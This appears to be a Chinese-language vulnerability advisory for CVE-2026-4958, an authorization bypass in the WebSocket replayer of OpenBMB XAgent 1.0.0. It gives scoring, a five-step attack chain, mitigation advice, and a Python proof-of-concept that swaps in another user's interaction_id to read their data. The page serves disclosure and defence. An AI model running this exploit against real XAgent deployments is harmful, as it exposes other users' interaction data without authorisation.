CVE-2026-4958 CVSS 3.1 低危

CVE-2026-4958 OpenBMB XAgent授权绕过漏洞

披露日期: 2026-03-27

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-4958

漏洞类型

授权绕过

CVSS评分

3.1 低危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

OpenBMB XAgent

漏洞概述

OpenBMB XAgent 1.0.0版本存在授权绕过漏洞。该漏洞位于WebSocket端点组件的replayer.py文件中，由于未正确校验interaction_id参数，攻击者可远程操纵该参数绕过身份验证。尽管利用难度较高，但成功攻击可能导致敏感数据泄露，建议用户尽快关注修复动态。

技术细节

该漏洞位于OpenBMB XAgent 1.0.0的WebSocket服务模块，具体涉及`XAgentServer/application/websockets/replayer.py`文件中的`ReplayServer.on_connect`和`ReplayServer.send_data`函数。漏洞产生的根本原因在于系统在处理WebSocket连接请求及数据发送时，过度信任客户端传入的`interaction_id`参数，缺乏对该参数与当前用户会话归属关系的严格验证。攻击者首先需要具备低权限账户（PR:L），然后通过建立WebSocket连接并发送特制的数据包，将`interaction_id`替换为目标交互的ID。由于系统后端未执行二次鉴权，攻击者能够成功绕过权限检查，获取其他用户的交互数据或执行未授权的操作。尽管CVSS指标显示攻击复杂度较高（AC:H），但该逻辑缺陷仍对数据机密性构成威胁。

攻击链分析

STEP 1

1. 侦察

攻击者识别运行OpenBMB XAgent 1.0.0的目标服务器及其WebSocket端点。

STEP 2

2. 获取低权限账号

注册或获取一个目标系统的低权限用户账户（满足PR:L要求）。

STEP 3

3. 构造恶意请求

攻击者编写脚本，连接到WebSocket服务，并在数据包中将`interaction_id`参数修改为试图访问的目标ID。

STEP 4

4. 发起攻击

发送包含篡改参数的WebSocket消息，绕过身份验证检查。

STEP 5

5. 数据泄露

成功绕过后，接收服务器返回的敏感交互数据。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import websockets
import asyncio
import json

# Target configuration
TARGET_URI = "ws://target-host:port/websocket/replayer"
TARGET_INTERACTION_ID = "target_user_interaction_id"  # ID to hijack
ATTACKER_TOKEN = "low_privilege_token" # If auth is required

async def exploit():
    # Construct malicious payload
    payload = {
        "interaction_id": TARGET_INTERACTION_ID,
        "data": "test_payload"
    }

    try:
        # Establish connection
        async with websockets.connect(TARGET_URI) as websocket:
            print("[+] Connected to WebSocket endpoint")
            
            # Send malicious data with modified interaction_id
            await websocket.send(json.dumps(payload))
            print(f"[+] Sent payload with interaction_id: {TARGET_INTERACTION_ID}")
            
            # Listen for response
            response = await websocket.recv()
            print(f"[+] Received response: {response}")
            
            if "unauthorized" not in response.lower():
                print("[!] Potential Authorization Bypass Successful!")
            else:
                print("[-] Attack failed")
                
    except Exception as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    asyncio.run(exploit())

影响范围

OpenBMB XAgent 1.0.0

防御指南

临时缓解措施

在官方修复补丁发布前，建议通过网络ACL限制对WebSocket端点（/websockets/replayer）的外部访问，或部署WAF规则检测并拦截包含异常`interaction_id`参数的请求。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-4958
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-4958
3 Details https://www.cvedetails.com/cve/CVE-2026-4958/
4 VulDB https://vuldb.com/cve/CVE-2026-4958
5 Link https://gist.github.com/YLChen-007/dc46c2a710ecb9e855695f32da8bcab5
6 Link https://vuldb.com/?ctiid.353835
7 Link https://vuldb.com/?id.353835
8 Link https://vuldb.com/?submit.777618

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表